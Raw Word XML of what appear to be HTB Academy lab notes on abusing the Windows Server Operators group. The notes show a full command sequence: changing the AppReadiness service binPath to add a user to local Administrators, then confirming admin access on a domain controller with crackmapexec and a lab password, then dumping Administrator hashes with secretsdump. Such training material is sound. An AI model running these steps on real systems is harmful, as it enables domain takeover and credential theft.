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6443" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D45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  <w:t>Server Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB82FCA" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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7CFDE28E">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E1CDE" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:anchor="bkmk-serveroperators" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="005D45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Server Operators</w:t>
        </w:r>
      </w:hyperlink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group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27764B3D" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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Membership of this group confers the powerful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D457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SeBackupPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D457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SeRestorePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spell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privileges and the ability to control local services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00312DCB" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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 xml:space="preserve">Querying the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D4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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D4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 xml:space="preserve"> Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B674EC" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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Let's examine the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D457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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spell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service. We can confirm that this service starts as SYSTEM using the </w:t>
      </w:r>
      <w:r w:rsidRPr="005D457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sc.exe</w:t>
      </w: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utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B07A12" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Querying the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spell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Service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847E1D2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</w:t>
      </w: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:\htb&gt;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sc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qc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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78AF3AF5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7575CB00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[SC]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QueryServiceConfig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SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F9C4E6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030375D0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SERVICE_NAME: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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36CB6044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TYPE             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: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20  WIN32_SHARE_PROCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338D0EC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START_TYPE       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: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3   DEMAND_START</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3AB67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ERROR_CONTROL    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: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1   NORMAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C354B3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BINARY_PATH_NAME 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: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C:\Windows\System32\svchost.exe -k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AppReadiness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-p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78953F66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LOAD_ORDER_GROUP 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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10AE2D4F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TAG              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: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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CEFEB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DISPLAY_NAME     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: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App Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CB108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DEPENDENCIES     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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B00759E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SERVICE_START_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NAME :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LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BAD15F4" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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 xml:space="preserve">Checking Service Permissions with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D4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PsService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A2FE652" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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can use the service viewer/controller </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="005D45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PsService</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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which is part of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spell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suite, to check permissions on the service. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D457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PsService</w:t>
      </w:r>
      <w:proofErr w:type="spell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works much like the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D457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sc</w:t>
      </w:r>
      <w:proofErr w:type="spell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utility and can display service status and configurations </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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and also</w:t>
      </w:r>
      <w:proofErr w:type="gram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allow you to start, stop, pause, resume, and restart services both locally and on remote hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA37F80" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Checking Service Permissions with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PsService</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F35AE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C:\htb&gt; c:\Tools\PsService.exe security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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="689B286E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236AE419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PsService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v2.25 - Service information and configuration utility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD4848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Copyright (C) 2001-2010 Mark Russinovich</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368ACAA6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Sysinternals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- www.sysinternals.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D09A4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0EB7890F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SERVICE_NAME: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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3211CBEF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DISPLAY_NAME: App Readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC94E3D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ACCOUNT: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LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18CB5FC4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SECURITY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25A15E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[ALLOW] NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC71B5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Query status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D930F6F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Query Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3F7A1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                Interrogate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FFC151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Enumerate Dependents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8147E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Pause/Resume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A271E56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Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C386C2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Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D159F30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User-Defined Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188BEB1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Read Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608665D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[ALLOW] BUILTIN\Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4BE45D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All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498490D0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[ALLOW] NT AUTHORITY\INTERACTIVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB44AE8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Query status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAB433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Query Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFBD34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Interrogate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A41F8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Enumerate Dependents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E184EA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User-Defined Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4B2DD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Read Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EA86C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[ALLOW] NT AUTHORITY\SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFEC70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Query status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE36D0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Query Config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4379B742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Interrogate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7835D2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Enumerate Dependents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B580C6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User-Defined Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19EA59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Read Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C401792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[ALLOW] BUILTIN\Server Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D52191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  All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875963B" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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This confirms that the Server Operators group has </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="005D45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SERVICE_ALL_ACCESS</w:t>
        </w:r>
      </w:hyperlink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access right, which gives us full control over this service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52115E7A" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Checking Local Admin Group Membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6250B3" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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Let's take a look at the current members of the local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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administrators</w:t>
      </w:r>
      <w:proofErr w:type="gram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group and confirm that our target account is not present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BECFD2" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Checking Local Admin Group Membership </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2837A19A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C:\htb&gt; net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localgroup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Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F6397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0FDC7F1C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Alias name     Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19051457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Comment        Administrators have complete and unrestricted access to the computer/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domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72EA05CD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16ED6C28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Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5AF68D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15B145A8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-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA0DFB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Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8728C0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Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22335466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Enterprise Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26399044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The command completed successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="005D45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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096057EC" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Modifying the Service Binary Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5019BCB2" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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Let's change the binary path to execute a command which adds our current user to the default local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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administrators</w:t>
      </w:r>
      <w:proofErr w:type="gram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group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668C8D7" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4573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Modifying the Service Binary Path </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEDA137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lastRenderedPageBreak/>
        <w:t xml:space="preserve">C:\htb&gt;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sc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config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AppReadiness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binPath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= "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cmd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/c net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localgroup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Administrators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server_adm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/add"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434EB543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3D8CB5F7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[SC]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ChangeServiceConfig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SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D8A6A" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Starting the Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023DB80" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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Starting the service fails, which is expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA892EC" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Starting the Service </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50191DE8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C:\htb&gt;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sc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start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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AppReadiness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E9D33A1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1FD2AC57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[SC]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StartService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FAILED 1053:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702A3B07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1F2768F1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The service did not respond to the start or control request in a timely fashion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1A085" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Confirming Local Admin Group Membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7E648" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D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If we check the membership of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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administrators</w:t>
      </w:r>
      <w:proofErr w:type="gram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group, we see that the command was executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013A3B71" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Confirming Local Admin Group Membership </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32070504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C:\htb&gt; net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localgroup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Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52582F50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1C1BF2A2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Alias name     Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7737F57C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Comment        Administrators have complete and unrestricted access to the computer/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domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38D17E93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57F18FDD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Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928EF8B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627A94AA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-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6308D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Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A14F30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Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67C697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Enterprise Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A8D1C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server_adm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3544478F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The command completed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A115E" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Confirming Local Admin Access on Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F90383" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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From here, we have full control over the Domain Controller and could retrieve all credentials from the NTDS database and access other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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systems, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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perform post-exploitation tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C08938E" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Confirming Local Admin Access on Domain Controller </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601175B1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yovecio@htb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[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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htb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]$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crackmapexec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smb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10.129.43.9 -u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server_adm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-p 'HTB_@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cademy_stdnt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!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCEF9B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6EE0BACA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SMB         10.129.43.9     445    WINLPE-DC01   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[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*] Windows 10.0 Build 17763 (name:WINLPE-DC01) (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domain:INLANEFREIGHT.LOCAL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) (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signing:True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) (SMBv1:False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6ABB0A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SMB         10.129.43.9     445    WINLPE-DC01   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[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+] INLANEFREIGHT.LOCAL\server_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adm:HTB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_@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cademy_stdnt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! (Pwn3d!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F963897" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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Retrieving NTLM Password Hashes from the Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105B70B" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005D4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D457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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Retrieving NTLM Password Hashes from the Domain Controller </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C180F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yovecio@htb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[/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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htb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]$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secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943C2FB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079BCE42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Impacket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v0.9.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22.dev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1+20200929.152157.fe642b24 - Copyright 2020 </w:t>
      </w:r>
      <w:proofErr w:type="spell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SecureAuth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Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4480DB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02104B52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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462642B5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[*] Dumping Domain Credentials (domain\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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uid:rid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:lmhash:nthash</w:t>
      </w:r>
      <w:proofErr w:type="spell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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA0341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[*] Using the DRSUAPI method to get NTDS.DIT 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secrets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ABBBBDC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Administrator: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500:aad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3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F22F2AB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[*] Kerberos keys </w:t>
      </w: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grabbed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AC43475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Administrator:aes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256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641D3808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Administrator:aes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128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB6857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Administrator:des</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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-cbc-md5:d60dfbbf20548938</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEBED9" w14:textId="77777777" w:rsidR="005D4573" w:rsidRPr="005D4573" w:rsidRDefault="005D4573" w:rsidP="005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5D45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[*] Cleaning up...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBD3CC" w14:textId="77777777" w:rsidR="00213442" w:rsidRPr="005D4573" w:rsidRDefault="00213442">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00213442" w:rsidRPr="005D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99"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="005D4573"/>
    <w:rsid w:val="0088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8573E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C2669A4E-272B-472A-ABE9-884091F8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5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D45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73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D4573"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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4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D457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D4573"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="windowtitle">
    <w:name w:val="window_title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005D45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573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oken">
    <w:name w:val="token"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005D4573"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-gray">
    <w:name w:val="text-gray"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005D4573"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-success">
    <w:name w:val="text-success"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005D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windows/win32/services/service-security-and-access-rights" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/psservice" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-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2023-08-07T11:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-07T11:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>